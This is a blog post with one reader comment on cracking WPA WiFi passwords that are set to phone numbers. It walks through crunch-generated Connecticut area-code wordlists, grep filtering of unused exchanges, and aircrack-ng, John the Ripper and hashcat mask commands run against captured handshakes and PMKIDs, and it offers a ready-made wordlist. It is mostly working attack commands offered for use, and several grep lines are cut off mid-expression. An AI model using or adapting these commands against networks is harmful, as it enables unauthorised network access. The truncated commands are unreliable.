Cracking WiFi – phone number wordlist

I used to see alot of networks setup and either the tech or the end user choosing the person/business’s phone number as the password. So I usually try to test these first when trying to crack a WiFi password.

I was looking into more efficient ways to crack the password if you were working in a virtual machine and didn’t have access to a GPU cracking rig to utilize hashcat.

You could pipe crunch to aircrack-ng on the fly and reduce some keyspace by prepending the area code :
crunch 10 10 -t 860%%%%%%% | aircrack-ng /root/handshake.cap -e MyESSID -w-
This results in testing 10 million different numbers.But you can reduce that keyspace and avoid unnecessary CPU time by pre-generating a wordlist with all the numbers and then removing the exchange prefixes that aren’t in use.

NANP (North American Numbering Plan) numbers are ten digits in length, and they are in the format: NXX-NXX-XXXX Where N is any digit 2-9 and X is any digit 0-9.
So removing any prefix that starts with 1 or 0 and and any service prefix N11 (i.e. 411,911 etc..) can be removed too, reducing this keyspace. Checking online databases of exchange listings for each state will you to allow the keyspace even further by removing unused/reserved.
Also, as of September 2016, all 555 numbers have been returned to the NANPA inventory except 555-1212 (national use directory assistance) and 555-4334 (national use assigned.) The fictitious, non-working numbers, 555-0100 through 555-0199, will remain reserved for entertainment/advertising.
So we will keep that in mind that we can remove another 102 entries per area code with the regex:
Connecticut doesn’t use the 555 prefix currently though so were going to just remove all of the 555 prefix, so by using crunch again and some regex grep’ing:

crunch 10 10 -t 860%%%%%%%>860.txt
cat 860.txt | grep -vP "^860[0,1]|^860[2,3,4,5,6,7,8,9]11\ |^860[2,3,5,6,7,9]00|^86093[1,4,6,7]|^86095[0,8,9]|^860555\
This knocks the results down to:
wc -l 860.txt 860numbers.txt
10000000 860.txt
7710000 860numbers.txt
reduced keyspace = 2,290,000

Now you’re thinking , shit there’s usually more than 1 area code per state. So for Connecticut there is 203, 860, 475, and 959. 959 doesnt have any exchanges yet afaik, 475 exchanges are relatively small currently, and 203 actually has more exchanges in use than 860. So we just do the same thing for 203:

crunch 10 10 -t 203%%%%%%%>203.txt
cat 203.txt | grep -vP "^203[0,1]|^203[2,3,4,5,6,7,8,9]11\

This knocks the results down to:
10000000 203phonenumber.txt
7770000 203.txt
reduced keyspace 2,230,000

After doing this for each area code, you can cat the files together to create a wordlist that you can pipe to aircrack-ng or john the ripper. If you’re a lazy reader from Connecticut, I am attaching the compiled wordlist (16.7mb):: of all 860/203/475 area codes (15,760,000 total).

It shouldn’t take a relatively long time to test against a captured handshake to see if they used phone number for the password. Using the 203 area code wordlist it took about 12 minutes, because it basically starts at the beginning phone number (i.e. 2032000000)
aircrack-ng -w /root/ctphonenumbers203.txt /root/handshake.cap -e MyESSID

Or you can use John the Ripper, first convert the cap file using:
hcxhash2cap --pmkid=test.16800 -c handshake.cap
john -w:allctnumbers.txt --format=wpapsk --pot=pmkid.cracked.pot test.16800

took about an hour on a vm to run through both area codes and crack it

If you are lucky to be able to use hashcat, the remaining number goes pretty quick with a good GPU, but also you can help to reduce the keyspace using charsets. Which the charset going through 7 digits took about 1 second to crack.

hashcat -m 16800 handshake.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d -w 4 --force -O
hashcat -m 16800 handshake.16800 -a 3 -1 23456789 860?1?d?d?d?d?d?d -w 4 --force -O

hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 860?2?1?1?1?1?1?1 -w 4 --force -O
hashcat -m 2500 handshake.hccapx -a 3 -1 ?d -2 23456789 203?2?1?1?1?1?1?1 -w 4 --force -O

Yes, cracking WPA-PMKID with a wordlist can be slow
with the 203 wordlist it took 53 seconds to crack
bruteforcing PMKID with a charset mask with GPU took one second 🙂
hashcat -m 16800 pkid.16800 -a 3 -1 23456789 203?1?d?d?d?d?d?d –force

So wordlists aren’t that great but if you’re stuck on a sub par PC and need something in a pinch its worth it to try before you try using larger wordlists etc. I’m writing this just for notes at 6 am, and suck at math, so let me know if I have any mistakes in the calculations etc.. in the comments. Will be doing a follow up article on how to capture PMKID’s on vulnerable targets.
Happy cracking.

Bookmark the permalink.

One Response to Cracking WiFi – phone number wordlist

  1. Confused Person says:

    This is amazing! I was hoping this exact capability existed within Kali, and alas, it does. I’m VERY new to this, especially anything “command line-ish”, so I’m struggling to understand exactly what you did here in order to convert it to 435, 385, and 801 area codes with a 200-999 prefix in each area code.
    Creating the basic “dumb” output with all the extraneous numbers (like 435-555-####) was easy, but I love how you created a command that sifted all of those out.
    There’s a $20 Venmo/PayPal reward if you’ll take the time to show me what that command would look like, with a little explainer as to how it was created/what each part of the command is actually doing so I can learn something 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *